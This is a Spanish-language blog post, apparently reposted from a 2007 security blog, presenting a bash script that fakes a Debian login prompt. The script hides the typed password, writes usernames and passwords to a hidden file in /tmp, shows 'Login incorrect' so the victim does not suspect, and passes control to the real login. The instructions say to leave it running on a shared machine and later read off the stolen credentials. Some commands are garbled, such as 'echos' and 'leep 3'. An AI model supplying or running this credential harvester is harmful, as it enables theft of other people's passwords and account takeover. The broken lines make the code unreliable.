falso_login #Abro editor de texto vi con el nombre de archivo falso_login.sh
clear
#Limpio pantalla
echo "Debian GNU/Linux 4.0 debian `tty cut -c6,7,8,9`" #Pantalla de inicio de Debian 4.0 ustedes pongan la que tienen
echo
echo -n "`uname -n` login: " #Imprimo nombre de host, seguido de la palabra login
read usu #Guardo en la variable usu el nombre de usuario capturado de teclado
stty -echonl -echo #Evita que se lea todo lo que se tipea, obviamente para no leer el password que se escribe
echo -n "Password: "
read pass #Escbribo la palabra password para que aparezca en pantalla y que el usuario la teclee
echos
leep 3
echo >> /tmp/.captura
echo "Usuario: $usu" >> /tmp/.captura #Envio el nombre de usuario capturado al archivo .pass ubicado en /tmp
echo "Contraseña: $pass" >> /tmp/.captura #Envio la password del usuario al mismo archivo que la linea anterior
echo >> /tmp/.captura
echo
echo "Login incorrect" #Muestro por pantalla login incorrecto para que el user no sospeche
echo
exec /bin/login #Ejecuto el verdadero login
Guardo el archivo con [ESC]: -> wq
Cambio permisos para que pueda ejecutarse:#chmod a+x falso_login.sh
Dejamos ejecutando esperando que algun usuario ingrese su login y su pass y listo
./falso_login.sh
Luego una vez que el usuario dejo la pc, volvemos a dicha maquina y vemos lo siguiente:
cat /tmp/.captura
Y veremos como resultado los usuarios y password que ingresaron
cat /tmp/.captura
Fuente: http://redes-seguridad.blogspot.com/2007/04/htcat-wq-cambio-permisos-para-que-pueda.html
Suscribirse a:
Enviar comentarios (Atom)
No hay comentarios:
Publicar un comentario